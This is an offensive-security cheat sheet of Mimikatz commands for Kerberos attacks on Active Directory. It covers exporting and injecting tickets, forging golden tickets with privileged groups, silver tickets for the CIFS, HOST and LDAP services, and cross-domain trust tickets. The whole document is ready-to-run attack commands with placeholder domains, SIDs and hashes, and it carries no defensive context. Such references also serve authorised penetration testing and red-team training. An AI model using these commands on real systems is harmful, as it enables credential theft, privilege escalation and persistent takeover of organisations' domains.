🎟️ Kerberos Attacks

🎭 Pass-the-Ticket (PtT)

# Export all tickets
Invoke-Mimikatz -Command '"sekurlsa::tickets /export"'

# Inject ticket
Invoke-Mimikatz -Command '"kerberos::ptt c:\temp\ticket.kirbi"'

# Purge tickets
Invoke-Mimikatz -Command '"kerberos::purge"'

🏆 Golden Ticket

# Create Golden Ticket
Invoke-Mimikatz -Command '"kerberos::golden /domain:corp.local /sid:S-1-5-21-XXX /krbtgt:HASH /user:Administrator /id:500 /ptt"'

# Custom groups
kerberos::golden /domain:corp.local /sid:S-1-5-21-XXX /krbtgt:HASH /user:FakeAdmin /id:1337 /groups:512,513,518,519,520 /ptt

🥈 Silver Ticket

# CIFS - File access
kerberos::golden /domain:corp.local /sid:S-1-5-21-XXX /target:dc01.corp.local /service:cifs /rc4:HASH /user:admin /ptt

# HOST - WMI/PSRemoting
kerberos::golden /domain:corp.local /sid:S-1-5-21-XXX /target:server.corp.local /service:HOST /rc4:HASH /user:admin /ptt

# LDAP - Directory queries
kerberos::golden /domain:corp.local /sid:S-1-5-21-XXX /target:dc01.corp.local /service:ldap /rc4:HASH /user:admin /ptt

🔗 Trust Tickets

# Cross-domain access
Invoke-Mimikatz -Command '"kerberos::golden /domain:child.local /sid:S-1-5-21-XXX /sids:S-1-5-21-YYY-519 /krbtgt:HASH /user:Administrator /ticket:trust.kirbi"'

---